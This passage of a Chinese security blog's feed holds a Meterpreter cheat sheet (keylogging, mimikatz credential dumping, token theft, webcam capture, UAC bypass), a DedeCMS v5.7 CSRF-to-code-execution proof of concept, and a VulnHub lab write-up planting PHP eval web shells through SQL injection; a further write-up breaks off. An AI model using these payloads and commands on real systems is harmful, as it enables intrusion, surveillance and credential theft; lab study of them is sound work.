keyscan_dump #存储目标主机上捕获的键盘记录</p><p>meterpreter > keyscan_stop #停止针对目标主机的键盘记录</p><h2 id="mimikatz"><a href="#mimikatz" class="headerlink" title="mimikatz"></a>mimikatz</h2><p>meterpreter > load mimikatz #加载mimikatz</p><p>meterpreter > msv #获取hash值</p><p>meterpreter > kerberos #获取明文</p><p>meterpreter >ssp #获取明文信息</p><p>meterpreter > wdigest #获取系统账户信息</p><p>meterpreter > mimikatz_command -f a:: #输入一个错误的模块,可以列出所有模块</p><p>meterpreter > mimikatz_command -f samdump:: #可以列出samdump的子命令</p><p>meterpreter > mimikatz_command -f samdump::hashe #获取目标 hash</p><p>meterpreter > mimikatz_command -f handle::list #列出应用进程</p><p>meterpreter > mimikatz_command -f service::list #列出服务</p><h2 id="网络嗅探"><a href="#网络嗅探" class="headerlink" title="网络嗅探"></a>网络嗅探</h2><p>meterpreter > use sniffer # 加载嗅探模块</p><p>meterpreter > sniffer_interfaces #列出目标主机所有开放的网络接口</p><p>meterpreter > sniffer_start ID #获取正在实施嗅探网络接口的统计数据</p><p>meterpreter > sniffer_dump ID FILEPATH #在目标主机上针对特定范围的数据包缓冲区启动嗅探</p><p>meterpreter > sniffer_stop ID #停止嗅探</p><p>对抓取的包进行解包:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/sniffer/psnuffle</span><br><span class="line">set pcapfile 1.cap</span><br><span class="line">run</span><br></pre></td></tr></table></figure></p><h2 id="捕捉屏幕"><a href="#捕捉屏幕" class="headerlink" title="捕捉屏幕"></a>捕捉屏幕</h2><p>screenshot #屏幕截图并存储在我们的系统之中</p><p>run vnc #弹出窗口,在此窗口中就是对方现在打开的桌面情况,在这里,可以对远程机器进行操控</p><h2 id="盗取令牌"><a href="#盗取令牌" class="headerlink" title="盗取令牌"></a>盗取令牌</h2><p>meterpreter >use incognito 加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)</p><p>meterpreter >list_tokens -u 列出目标主机用户的可用令牌</p><p>meterpreter >list_tokens -g 列出目标主机用户组的可用令牌</p><p>meterpreter >impersonate_token DOMAIN_NAME\USERNAME 假冒目标主机上的可用令牌,如meterpreter > impersonate_token QLWEB\Administrato</p><p>meterpreter >execute -f cmd.exe -i -t #调用域权限shell</p><p>meterpreter > getuid</p><p>meterpreter>add_user 0xfa funny –h192.168.3.98 #在域控主机上添加账户</p><p>meterpreter>reg command # 在目标主机注册表中进行交互,创建,删除,查询等操作</p><p>meterpreter>setdesktop number #切换到另一个用户界面(该功能基于哪些用户已登录)</p><p>meterpreter>ps #查看目标机器进程,找出域控账户运行的进程ID</p><p>meterpreter>steal_token pid #盗窃给定进行的可用令牌并进行令牌假冒</p><p>meterpreter>drop_token pid #停止假冒当前令牌</p><h2 id="网络摄像头"><a href="#网络摄像头" class="headerlink" title="网络摄像头"></a>网络摄像头</h2><p>record_mic #音频录制</p><p>webcam_chat #查看摄像头接口</p><p>webcam_list #查看摄像头列表</p><p>webcam_stream #摄像头视频获取</p><p>webcam_snap #抓取目标主机当前的摄像头拍摄到的画面,并将它以图片形式保存到本地</p><h2 id="内网扫描"><a href="#内网扫描" class="headerlink" title="内网扫描"></a>内网扫描</h2><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><blockquote><blockquote><p>use auxiliary/scanner/portscan/tcp</p></blockquote></blockquote><h4 id="存活主机扫描"><a href="#存活主机扫描" class="headerlink" title="存活主机扫描"></a>存活主机扫描</h4><blockquote><blockquote><p>run arp_scanner -r 192.168.1.0/24</p></blockquote></blockquote><h2 id="绕过UAC"><a href="#绕过UAC" class="headerlink" title="绕过UAC"></a>绕过UAC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">msf>use exploit/windows/local/ask</span><br><span class="line"></span><br><span class="line">msf>show options</span><br><span class="line"></span><br><span class="line">msf>set session 1</span><br><span class="line"></span><br><span class="line">msf>exploit</span><br></pre></td></tr></table></figure>]]></content>
<summary type="html">
<h2 id="基本命令"><a href="#基本命令" class="headerlink" title="基本命令"></a>基本命令</h2><h4 id="background"><a href="#background" class="headerlink" titl
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="metasploit" scheme="http://yoursite.com/tags/metasploit/"/>
</entry>
<entry>
<title>DeDecms v5.7 sp2 CRSF+文件操作 前台getshell</title>
<link href="http://yoursite.com/2019/05/12/DeDecms-v5-7-sp2-CRSF-%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C-%E5%89%8D%E5%8F%B0getshell/"/>
<id>http://yoursite.com/2019/05/12/DeDecms-v5-7-sp2-CRSF-文件操作-前台getshell/</id>
<published>2019-05-12T13:30:29.000Z</published>
<updated>2020-03-14T15:36:41.482Z</updated>
<content type="html"><![CDATA[<p>在plus/search.php中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">if(empty($typeid))</span><br><span class="line">{</span><br><span class="line"> $typenameCacheFile = DEDEDATA.'/cache/typename.inc';</span><br><span class="line"> if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )</span><br><span class="line"> {</span><br><span class="line"> $fp = fopen(DEDEDATA.'/cache/typename.inc', 'w');</span><br><span class="line"> fwrite($fp, "<"."?php\r\n");</span><br><span class="line"> $dsql->SetQuery("Select id,typename,channeltype From `#@__arctype`");</span><br><span class="line"> $dsql->Execute();</span><br><span class="line"> while($row = $dsql->GetArray())</span><br><span class="line"> {</span><br><span class="line"> fwrite($fp, "\$typeArr[{$row['id']}] = '{$row['typename']}';\r\n"); //存在漏洞</span><br><span class="line"> }</span><br><span class="line"> fwrite($fp, '?'.'>');</span><br><span class="line"> fclose($fp);</span><br><span class="line"> }</span><br><span class="line"> //引入栏目缓存并看关键字是否有相关栏目内容</span><br><span class="line"> require_once($typenameCacheFile);</span><br><span class="line"> if(isset($typeArr) && is_array($typeArr))</span><br><span class="line"> {</span><br><span class="line"> foreach($typeArr as $id=>$typename)</span><br><span class="line"> {</span><br><span class="line"> //$keywordn = str_replace($typename, ' ', $keyword);</span><br><span class="line"> $keywordn = $keyword;</span><br><span class="line"> if($keyword != $keywordn)</span><br><span class="line"> {</span><br><span class="line"> $keyword = HtmlReplace($keywordn);</span><br><span class="line"> $typeid = intval($id);</span><br><span class="line"> break;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure></p><p>该段代码会将数据库中读取的栏目信息写入typename.inc文件中,然后require_once()包含该文件,写文件的代码如下:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">fwrite($fp, "\$typeArr[{$row['id']}] = '{$row['typename']}';\r\n");</span><br></pre></td></tr></table></figure></p><p>$row[‘typename’]是可控参数,如果值是 1’;phpinfo();// 这样的形式,写入的字符串为:$typeArr[2] = ‘1’;phpinfo();//‘;<br>从而require_once()包含该文件后就会执行phpinfo()<br>通过查找,dede/catalog_add.php中可以控制该参数:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line">else if($dopost=='save')</span><br><span class="line">{</span><br><span class="line"> $smalltypes = '';</span><br><span class="line"> if(empty($smalltype)) $smalltype = '';</span><br><span class="line"> if(is_array($smalltype)) $smalltypes = join(',',$smalltype);</span><br><span class="line"> </span><br><span class="line"> if(!isset($sitepath)) $sitepath = '';</span><br><span class="line"> if($topid==0 && $reid>0) $topid = $reid;</span><br><span class="line"> if($ispart!=0) $cross = 0;</span><br><span class="line"> </span><br><span class="line"> $description = Html2Text($description,1);</span><br><span class="line"> $keywords = Html2Text($keywords,1);</span><br><span class="line"> </span><br><span class="line"> if($ispart != 2 )</span><br><span class="line"> {</span><br><span class="line"> //栏目的参照目录</span><br><span class="line"> if($referpath=='cmspath') $nextdir = '{cmspath}';</span><br><span class="line"> if($referpath=='basepath') $nextdir = '';</span><br><span class="line"> //用拼音命名</span><br><span class="line"> if($upinyin==1 || $typedir=='')</span><br><span class="line"> {</span><br><span class="line"> $typedir = GetPinyin(stripslashes($typename));</span><br><span class="line"> }</span><br><span class="line"> $typedir = $nextdir.'/'.$typedir;</span><br><span class="line"> $typedir = preg_replace("#\/{1,}#", "/", $typedir);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> //开启多站点时的设置(仅针对顶级栏目)</span><br><span class="line"> if($reid==0 && $moresite==1)</span><br><span class="line"> {</span><br><span class="line"> $sitepath = $typedir;</span><br><span class="line"></span><br><span class="line"> //检测二级网址</span><br><span class="line"> if($siteurl!='')</span><br><span class="line"> {</span><br><span class="line"> $siteurl = preg_replace("#\/$#", "", $siteurl);</span><br><span class="line"> if(!preg_match("#http:\/\/#i", $siteurl))</span><br><span class="line"> {</span><br><span class="line"> ShowMsg("你绑定的二级域名无效,请用(http://host)的形式!","-1");</span><br><span class="line"> exit();</span><br><span class="line"> }</span><br><span class="line"> if(preg_match("#".$cfg_basehost."#i", $siteurl))</span><br><span class="line"> {</span><br><span class="line"> ShowMsg("你绑定的二级域名与当前站点是同一个域,不需要绑定!","-1");</span><br><span class="line"> exit();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> //创建目录</span><br><span class="line"> if($ispart != 2)</span><br><span class="line"> {</span><br><span class="line"> $true_typedir = str_replace("{cmspath}", $cfg_cmspath, $typedir);</span><br><span class="line"> $true_typedir = preg_replace("#\/{1,}#", "/", $true_typedir);</span><br><span class="line"> if(!CreateDir($true_typedir))</span><br><span class="line"> {</span><br><span class="line"> ShowMsg("创建目录 {$true_typedir} 失败,请检查你的路径是否存在问题!","-1");</span><br><span class="line"> exit();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> </span><br><span class="line"> $in_query = "INSERT INTO `#@__arctype`(reid,topid,sortrank,typename,typedir,isdefault,defaultname,issend,channeltype,</span><br><span class="line"> tempindex,templist,temparticle,modname,namerule,namerule2,</span><br><span class="line"> ispart,corank,description,keywords,seotitle,moresite,siteurl,sitepath,ishidden,`cross`,`crossid`,`content`,`smalltypes`)</span><br><span class="line"> VALUES('$reid','$topid','$sortrank','$typename','$typedir','$isdefault','$defaultname','$issend','$channeltype',</span><br><span class="line"> '$tempindex','$templist','$temparticle','default','$namerule','$namerule2',</span><br><span class="line"> '$ispart','$corank','$description','$keywords','$seotitle','$moresite','$siteurl','$sitepath','$ishidden','$cross','$crossid','$content','$smalltypes')";</span><br><span class="line"></span><br><span class="line"> if(!$dsql->ExecuteNoneQuery($in_query))</span><br><span class="line"> {</span><br><span class="line"> ShowMsg("保存目录数据时失败,请检查你的输入资料是否存在问题!","-1");</span><br><span class="line"> exit();</span><br><span class="line"> }</span><br><span class="line"> UpDateCatCache();</span><br><span class="line"> if($reid>0)</span><br><span class="line"> {</span><br><span class="line"> PutCookie('lastCid',GetTopid($reid),3600*24,'/');</span><br><span class="line"> }</span><br><span class="line"> ShowMsg("成功创建一个分类!","catalog_main.php");</span><br><span class="line"> exit();</span><br><span class="line"></span><br><span class="line">}//End dopost==save</span><br></pre></td></tr></table></figure></p><p>该段代码可以添加一个栏目信息,并且没有任何针对CSRF的防御措施,因此可以在管理员条件下访问:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/dedecms/dede/catalog_add.php?dopost=save&typename=';phpinfo();//</span><br></pre></td></tr></table></figure></p><p>或者诱骗管理员点击该链接,即可在数据表中添加存在恶意代码的字段<br>前台访问<a href="http://127.0.0.1/dedecms/plus/search.php" target="_blank" rel="noopener">http://127.0.0.1/dedecms/plus/search.php</a> 即可将恶意代码写入typename.inc中,然后require_once()包含该文件并执行恶意代码</p><h3 id="poc"><a href="#poc" class="headerlink" title="poc"></a>poc</h3><p>构造链接:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/dedecms/dede/catalog_add.php?dopost=save&typename=';phpinfo();//</span><br></pre></td></tr></table></figure></p><p>在管理员条件下访问或者诱骗管理员点击该链接,然后访问前台访问<a href="http://127.0.0.1/dedecms/plus/search.php" target="_blank" rel="noopener">http://127.0.0.1/dedecms/plus/search.php</a><br>成功执行恶意代码:<br><img src="/2019/05/12/DeDecms-v5-7-sp2-CRSF-文件操作-前台getshell/1.png" alt=""><br>可以查看typename.inc中确实写入了恶意代码:<br><img src="/2019/05/12/DeDecms-v5-7-sp2-CRSF-文件操作-前台getshell/2.png" alt=""></p>]]></content>
<summary type="html">
<p>在plus/search.php中:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line
</summary>
<category term="web安全" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/"/>
<category term="代码审计" scheme="http://yoursite.com/categories/web%E5%AE%89%E5%85%A8/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
<category term="代码审计" scheme="http://yoursite.com/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
</entry>
<entry>
<title>VulnHub-Acid Server Writeup</title>
<link href="http://yoursite.com/2019/04/26/VulnHub-Acid-Server-Writeup/"/>
<id>http://yoursite.com/2019/04/26/VulnHub-Acid-Server-Writeup/</id>
<published>2019-04-26T03:04:56.000Z</published>
<updated>2019-04-26T03:05:47.081Z</updated>
<content type="html"><![CDATA[<h2 id="目标"><a href="#目标" class="headerlink" title="目标"></a>目标</h2><p>Escalate the privileges to root and capture the flag. Once anyone able to beat the machine then please let me know.</p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><blockquote><blockquote><p>nmap -p 1-65535 -T4 -A -v 192.168.1.101<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">PORT STATE SERVICE VERSION</span><br><span class="line">33447/tcp open http Apache httpd 2.4.10 ((Ubuntu))</span><br><span class="line">| http-methods: </span><br><span class="line">|_ Supported Methods: GET HEAD POST OPTIONS</span><br><span class="line">|_http-server-header: Apache/2.4.10 (Ubuntu)</span><br><span class="line">|_http-title: /Challenge</span><br><span class="line">MAC Address: 00:0C:29:6F:66:8B (VMware)</span><br><span class="line">Device type: general purpose</span><br><span class="line">Running: Linux 3.X|4.X</span><br><span class="line">OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4</span><br><span class="line">OS details: Linux 3.2 - 4.9</span><br><span class="line">Uptime guess: 198.840 days (since Sun Oct 7 03:09:34 2018)</span><br><span class="line">Network Distance: 1 hop</span><br><span class="line">TCP Sequence Prediction: Difficulty=261 (Good luck!)</span><br><span class="line">IP ID Sequence Generation: All zeros</span><br></pre></td></tr></table></figure></p></blockquote></blockquote><h3 id="页面信息"><a href="#页面信息" class="headerlink" title="页面信息"></a>页面信息</h3><p>index.php源代码中:<br>0x643239334c6d70775a773d3d<br>d293LmpwZw==<br>wow.jpg </p><blockquote><blockquote><p>strings wow.jpg<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">"""%%%)))///333777999>>>@@@DDDKKKOOORRRUUU[[[^^^cccfffkkknnnssswwwxxx~~~</span><br><span class="line"></span><br><span class="line">"%)/379>@DKORU[^cfknswx~</span><br></pre></td></tr></table></figure></p></blockquote></blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">37:61:65:65:30:66:36:64: </span><br><span class="line">35:38:38:65:64:39:39:30: </span><br><span class="line">35:65:65:33:37:66:31:36: </span><br><span class="line">61:37:63:36:31:30:64:34 </span><br><span class="line"></span><br><span class="line">7:a:e:e:0:f:6:d </span><br><span class="line">5:8:8:e:d:9:9:0 </span><br><span class="line">5:e:e:3:7:f:1:6 </span><br><span class="line">a:7:c:6:1:0:d:4 </span><br><span class="line"></span><br><span class="line">63425</span><br></pre></td></tr></table></figure><p>目录:/Challenge</p><h3 id="dirbruter扫描目录"><a href="#dirbruter扫描目录" class="headerlink" title="dirbruter扫描目录"></a>dirbruter扫描目录</h3><p>/Challenge下存在:<br>index.php<br>error.php<br>cake.php<br>hacked.php<br>include.php </p><h4 id="利用文件包含漏洞"><a href="#利用文件包含漏洞" class="headerlink" title="利用文件包含漏洞"></a>利用文件包含漏洞</h4><p>include.php下页面源码存在:<br>0x59 33 56 6a 4c 6e 4a 34 62 6e 41 3d<br>Y3VjLnJ4bnA=<br>cuc.rxnp</p><p>查看hack.php文件:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.1.103:33447/Challenge/include.php</span><br><span class="line">?file=php://filter/convert.base64-encode/resource=hacked.php&add=Extract+File</span><br></pre></td></tr></table></figure></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">include_once 'includes/db_connect.php';</span><br><span class="line">include_once 'includes/functions.php';</span><br><span class="line"></span><br><span class="line">sec_session_start();</span><br><span class="line"></span><br><span class="line">if (!isset($_SESSION['protected_page'])){</span><br><span class="line">header('Location: protected_page.php');</span><br><span class="line">exit;</span><br><span class="line">}</span><br><span class="line">if (!isset($_SESSION['index_page'])){</span><br><span class="line">header('Location: protected_page.php');</span><br><span class="line">exit;</span><br><span class="line">}</span><br><span class="line">?></span><br><span class="line"><!DOCTYPE html></span><br><span class="line"><html></span><br><span class="line"><head></span><br><span class="line"><meta charset="UTF-8"></span><br><span class="line"><link rel="stylesheet" href="css/style.css"></span><br><span class="line"><link rel="stylesheet" href="styles/main.css" /></span><br><span class="line"><title>Try to Extract Juicy details</title></span><br><span class="line"></head></span><br><span class="line"><body></span><br><span class="line"><div class="wrapper"></span><br><span class="line"> <div class="container"></span><br><span class="line"><?php</span><br><span class="line">if(isset($_REQUEST['add']))</span><br><span class="line">{</span><br><span class="line">$dbhost = 'localhost';</span><br><span class="line">$dbuser = 'root';</span><br><span class="line">$dbpass = 'mehak';</span><br><span class="line">$conn = mysql_connect($dbhost, $dbuser, $dbpass);</span><br><span class="line">if(! $conn )</span><br><span class="line">{</span><br><span class="line"> die('Could not connect: ' . mysql_error());</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$id = $_POST['id'];</span><br><span class="line">$sql = "SELECT * FROM members WHERE ID = (('$id'))";</span><br><span class="line">mysql_select_db('secure_login');</span><br><span class="line">$retval = mysql_query( $sql, $conn );</span><br><span class="line">if(! $retval )</span><br><span class="line">{</span><br><span class="line"> die('Could not enter data: ' . mysql_error());</span><br><span class="line">}</span><br><span class="line">echo "You have entered ID successfully...Which is not a big deal :D\n";</span><br><span class="line">mysql_close($conn);</span><br><span class="line">}</span><br><span class="line">?></span><br><span class="line"> <p> <h1>You are going Good...Show me your Ninja Skills.</h1> <br> </span><br><span class="line"><form method="get" action="<?php $_PHP_SELF ?>"></span><br><span class="line">Enter your ID:<input name="id" placeholder="id" type="text" id="id" maxlength="20"></span><br><span class="line"><input name="add" type="submit" id="add" value="Add ID"></span><br><span class="line"></span><br><span class="line"></body></span><br><span class="line"></html></span><br></pre></td></tr></table></figure><p>发现sql注入漏洞,sqlmap跑一下</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sqlmap.py -u "http://192.168.1.103:33447/Challenge/hacked.php" --data "add=1&id=1" --cookie="sec_session_id=4ua5he692ts3mo6c71oo6i6qn7" --dump -C "email,password,username" -T"members" -D "secure_login"</span><br></pre></td></tr></table></figure><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+</span><br><span class="line">| email | password | username |</span><br><span class="line">+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+</span><br><span class="line">| [email protected] | 53b9bd4416ec581838c4bde217e09f1206b94cdb95475cddda862894f4dbbeec5ceacc2e116a64cb56d8384404738c5fd16478e0266962eeb3b61da1918d5931 | Acid |</span><br><span class="line">| [email protected] | c124191d7a267cb2b83b2c59a30b2e388b77f13955340015462bffc0d90cfa7b402ecb8e3fc82717f22b127c98a4afa9ed4f3661d824c6c57a1490f9963d9234 | saman |</span><br><span class="line">| [email protected] | 00807432eae173f652f2064bdca1b61b290b52d40e429a7d295d76a71084aa96c0233b82f1feac45529e0726559645acaed6f3ae58a286b9f075916ebf66cacc | test_user |</span><br><span class="line">| [email protected] | fb8db054a75254633052d951002065109cd96fe990bf5a5d5bd1581d3578235a69224784b29870046d21d95567cdfe292221fbabce17201b23ca0fd5ee4fa20e | Vivek |</span><br><span class="line">+------------------------+----------------------------------------------------------------------------------------------------------------------------------+-----------+</span><br></pre></td></tr></table></figure><p>全部解密失败</p><p>尝试密码组合:<br>cuc.rxnp63425<br>63425cuc.rxnp<br>失败</p><h3 id="sql注入写马"><a href="#sql注入写马" class="headerlink" title="sql注入写马"></a>sql注入写马</h3><p>id=1’)) union select 1,2,3,4,’<?php @eval($_POST[cmd]); ?>’ into outfile ‘/tmp/123.php’–%20%20</p><p>成功写入一句话木马,include.php中包含:<br><a href="http://192.168.1.104:33447/Challenge/include.php?file=/tmp/123.php&add=Extract+File" target="_blank" rel="noopener">http://192.168.1.104:33447/Challenge/include.php?file=/tmp/123.php&add=Extract+File</a><br>POST:cmd=phpinfo(); </p><p>成功显示phpinfo,找到了web路径/var/www/html/Challenge/,因为include.php需要cookie,用菜刀连接比较麻烦,所以在该目录下再写一个一句话木马.<br>cmd=file_put_contents(“/var/www/html/Challenge/hack.php”,”<?php @eval($_POST[a]); ?>”);&a=$_POST[a] </p><p>菜刀连接 </p><h2 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h2><p>/Challenge下发现文件VXNlcnMudHh0,base64解码后为Users.txt<br>内容:zbp.yvnzt@qvpn </p><p>Y0dGemN5NTBlSFE9,解密后为pass.txt<br>内容:__341xnurZ</p><p>查找用户文件:</p><blockquote><blockquote><p>find / -user acid 2>/dev/null </p></blockquote></blockquote><p>找到一个流量包,分析找到saman密码:1337hax0r </p><p>切换用户,找到flag.txt</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><h3 id="存在的问题"><a href="#存在的问题" class="headerlink" title="存在的问题"></a>存在的问题</h3><p>1.在web漏洞利用中耗时太多,然而漏洞利用并不难<br>2.获取shell后不知道怎么提权,随意翻看文件且毫无头绪. </p><h3 id="解决"><a href="#解决" class="headerlink" title="解决"></a>解决</h3><p>基于目标进行渗透:</p><ul><li>利用web漏洞的目的是拿到shell,在此基础上以最快、最简洁、最隐蔽的方式利用漏洞获取shell</li><li>渗透的本质是信息搜集,基于目标搜索目标的详细信息,端口、目录、用户文件、系统文件、安装的软件等等,越详细越有利</li></ul>]]></content>
<summary type="html">
<h2 id="目标"><a href="#目标" class="headerlink" title="目标"></a>目标</h2><p>Escalate the privileges to root and capture the flag. Once anyone able
</summary>
<category term="渗透测试" scheme="http://yoursite.com/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
</entry>
<entry>
<title>VulnHub-Freshly Writeup</title>
<link href="http://yoursite.com/2019/04/19/VulnHub-Freshly-Writeup/"/>
<id>http://yoursite.com/2019/04/19/VulnHub-Freshly-Writeup/</id>
<published>2019-04-19T04:45:50.000Z</published>
<updated>2019-04-19T05:11:19.626Z</updated>
<content type="html"><![CDATA[<h2 id="目标"><a href="#目标" class="headerlink" title="目标"></a>目标</h2><p>The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. :)</p><p>There are a couple of different ways that you can go with this one. Good luck!</p><p>Simply download and import the OVA file into virtualbox!</p><p>VulnHub note: You may have issues when importing to VMware. If this is the case. extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: <a href="https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/" target="_blank" rel="noopener">https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/</a>.</p><h2 id="信息搜集"><a href="#信息搜集" class="headerlink" title="信息搜集"></a>信息搜集</h2><h3 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h3><p>Quick scan</p><blockquote><blockquote><p>nmap -T4 -F 192.168.1.104</p></blockquote></blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 